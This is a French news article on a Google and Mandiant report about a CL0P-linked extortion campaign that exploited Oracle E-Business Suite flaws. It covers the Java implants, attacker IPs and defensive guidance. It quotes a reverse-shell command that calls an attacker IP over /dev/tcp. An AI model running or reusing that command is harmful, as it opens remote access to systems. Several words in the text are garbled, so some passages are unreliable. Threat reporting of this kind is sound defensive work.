Google signale l'exploitation d'une « quantité massive de données clients » dans une campagne d'extorsion

Google a signalé une importantetracde données clients perpétrée par des individus malveillants, soupçonnés d'être impliqués dans une affaire d'extorsion. Google Threat Intelligence et Mandiant tracretracé l'opération d'exploitation jusqu'à des attaquants potentiellement liés au groupe d'extorsion CL0P.

Le groupe de renseignement sur les menaces de Google (GTIG) et Mandiant ont mis au jour une vaste campagne d'extorsion exploitant les vulnérabilités de la suite Oracle E-Business Suite (EBS). Cette campagne a entraîné le vol d'un grand nombre de données clients. Selon eux, l'opération a débuté le 29 septembre 2025 et impliquait un groupe se réclamant du réseau d'extorsion CL0P.

Google et Mandiant révèlent une faille zero-day 

Selon le rapport de Google, les attaquants ont envoyé un « grand nombre » de courriels à des dirigeants de plusieurs organisations, alléguant des violations de leurs environnements Oracle EBS et menaçant de publier des données volées à moins qu'une rançon ne soit payée. 

Les courriels, envoyés depuis des centaines de comptes tiers compromis, incluaient des adresses de contact, [email protected] et [email protected], précédemment liées au site de fuite de données CL0P.

L'enquête conjointe de Google et Mandiant a révélé que l'exploitation de cette vulnérabilité remonte à juillet 2025 et est possiblement liée à une faille zero-day désormais tracCVE-2025-61882. Dans certains cas, les attaquants auraient exfiltré une quantité importante de données des organisations touchées.

Oracle a déclaré que les failles exploitées avaient été corrigées en juillet, mais a ensuite publié des mises à jour d'urgence le 4 octobre afin de remédier à des vulnérabilités supplémentaires. Oracle a conseillé à ses clients d'utiliser les derniers correctifs critiques et a insisté sur l'importance de maintenir à jour tous les correctifs pour éviter toute compromission.

Le groupe d'extorsion CL0P est actif depuis 2020 et est historiquement lié au groupe de cybercriminels FIN11. Il a déjà ciblé des systèmes de transfert de fichiers gérés tels que MOVEit, GoAnywhere et Accellion FTA. Ces campagnes suivaient un schéma similaire : exploitation massive de vulnérabilités zero-day, vol de données sensibles et extorsion quelques semaines plus tard. 

Au moment de la publication du rapport, aucune nouvelle victime de cet incidentdent apparue sur le site de fuite de données de CL0P. 

Implants Java complexes à plusieurs étapes

Google et Mandiant révèle que les attaquants ont utilisé plusieurs chaînes d'exploitation ciblant les composants d'Oracle EBS, notamment UiServlet et SyncServlet, pour exécuter du code à distance et implanter des programmes Java en plusieurs étapes.

En juillet 2025, une activité suspecte a été observée, impliquant des requêtes HTTP vers /OA_HTML/configurator/UiServlet. Cette activité suspecte a été constatée lors d'une autre exploitation qui a ensuite fait surface dans un groupe Telegram nommé « SCATTERED LAPSUS$ HUNTERS » 

La faille divulguée utilisait plusieurs techniques avancées pour prendre le contrôle des serveurs ciblés, telles qu'une falsification de requête côté serveur (SSRF), un contournement d'authentification et une injection de modèle XSL.

En août 2025, les attaquants ont commencé à utiliser un autre outil appelé SyncServlet pour créer et exécuter des modèles malveillants au sein de la base de données EBS. Ces modèles contenaient des charges utiles XSL encodées en Base64 qui chargeaient directement en mémoire des logiciels malveillants Java. 

Parmi les implantsdentfiguraient GOLDVEIN.JAVA, un téléchargeur qui récupérait des charges utiles de deuxième niveau à partir de serveurs de commande contrôlés par l'attaquant, et une chaîne multicouche baptisée SAGE, qui installait des filtres de servlet Java persistants pour une exploitation ultérieure.

Après avoir pénétré le système, les attaquants ont utilisé le compte EBS « applmgr » pour explorer le système, collecter des informations sur le réseau et le système, puis installer d'autres fichiers malveillants. Ils ont également utilisé des commandes shell telles que ip addr, netstat -an et bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

Les adresses IP 200.107.207.26 et 161.97.99.49 ont étédentdans des tentatives d'exploitation, tandis que 162.55.17.215:443 et 104.194.11.200:443 ont été répertoriées comme serveurs de commande et de contrôle pour la charge utile GOLDVEIN.JAVA.

GTIG n'a pas formellement lié l'opération à un groupe connu, mais la campagne présente des similitudes avec FIN11, un groupe de cybercriminels à motivation financière qui était auparavant associé au ransomware CL0P et à des opérations de vol de données à grande échelle. 

Mandiant a également noté que l'un des comptes compromis utilisés pour envoyer les courriels d'extorsion avait été utilisé lors d'attaques antérieures liées à FIN11.

Les utilisateurs sont invités à se méfier des tables de base de données EBS XDO_TEMPLATES_B et XDO_LOBS, en particulier celles dont le nom commence par « TMP » ou « DEF », et à bloquer le trafic Internet externe provenant des serveurs EBS afin d’empêcher toute nouvelle extorsion de données.

Les organisations recommandent également une surveillance étroite des requêtes HTTP vers des points de terminaison tels que /OA_HTML/SyncServlet et /OA_HTML/configurator/UiServlet, ainsi que l'analyse des vidages mémoire pour détecter la présence de charges utiles Java en mémoire.

Google a averti que les groupes liés à CL0P continueront très probablement à consacrer leurs ressources à l'acquisition d'exploits zero-day.